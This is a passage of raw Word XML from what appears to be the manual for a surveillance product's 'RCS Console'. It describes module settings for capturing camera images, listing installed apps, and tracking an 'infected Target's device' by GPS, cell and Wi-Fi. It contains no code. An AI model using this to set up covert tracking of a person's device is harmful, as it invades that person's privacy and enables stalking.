        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Modules that present additional parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF348A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0B7A" w:rsidRDefault="001F0B7A" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F0B7A" w:rsidRDefault="001F0B7A" w:rsidP="00D641D7">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D641D7" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00332A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.25</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00A52C9B" w:rsidRDefault="00332A81" w:rsidP="00332A8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(Camera)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1193" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.55pt;height:94.6pt;z-index:251787264;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId174" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1193" DrawAspect="Content" ObjectID="_1446455392" r:id="rId309"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Quality</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the image quality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">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6"/>
        <w:gridCol w:w="283"/>
        <w:gridCol w:w="5649"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D641D7" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="3495" w:dyaOrig="2130">
                <v:shape id="_x0000_i1106" type="#_x0000_t75" style="width:174.75pt;height:106.5pt" o:ole="">
                  <v:imagedata r:id="rId310" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1106" DrawAspect="Content" ObjectID="_1446455321" r:id="rId311"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.26</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00A52C9B" w:rsidRDefault="00332A81" w:rsidP="00332A8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(Device)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5649" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Retrieve application list</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="005804D2" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>records the list of installed applications, in addition to system information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-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1"/>
        <w:gridCol w:w="283"/>
        <w:gridCol w:w="6034"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D641D7" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3311" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:r>
              <w:object w:dxaOrig="2880" w:dyaOrig="2970">
                <v:shape id="_x0000_i1107" type="#_x0000_t75" style="width:2in;height:148.5pt" o:ole="">
                  <v:imagedata r:id="rId312" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1107" DrawAspect="Content" ObjectID="_1446455322" r:id="rId313"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00332A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.27</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00A52C9B" w:rsidRDefault="00332A81" w:rsidP="00332A8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sidRPr="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">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(Position)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6034" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="005804D2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="005804D2" w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GPS</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="005804D2" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">records </w:t>
            </w:r>
            <w:r w:rsidR="00214D97" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidR="005804D2" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>position using the GPS system</w:t>
            </w:r>
            <w:r w:rsidR="00214D97" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (latitude and longitude)</w:t>
            </w:r>
            <w:r w:rsidR="005804D2" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005804D2" w:rsidRPr="00332A81" w:rsidRDefault="005804D2" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cell</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] records the </w:t>
            </w:r>
            <w:r w:rsidR="00214D97" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>position using the</w:t>
            </w:r>
            <w:r w:rsidR="00214D97" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> GSM cell </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005804D2" w:rsidRPr="00332A81" w:rsidRDefault="005804D2" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005804D2" w:rsidRPr="00332A81" w:rsidRDefault="005804D2" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WiFi</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00214D97" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">records the infected Target’s device position using </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Wi</w:t>
            </w:r>
            <w:r w:rsidR="008E44B2">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Fi information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00332A81" w:rsidRDefault="00332A81" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00332A81" w:rsidRDefault="00332A81">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-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9"/>
        <w:gridCol w:w="236"/>
        <w:gridCol w:w="5383"/>
      </w:tblGrid>
      <w:tr w:rsidR="00332A81" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.28</w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Operation #</w:t>
            </w:r>
          </w:p>
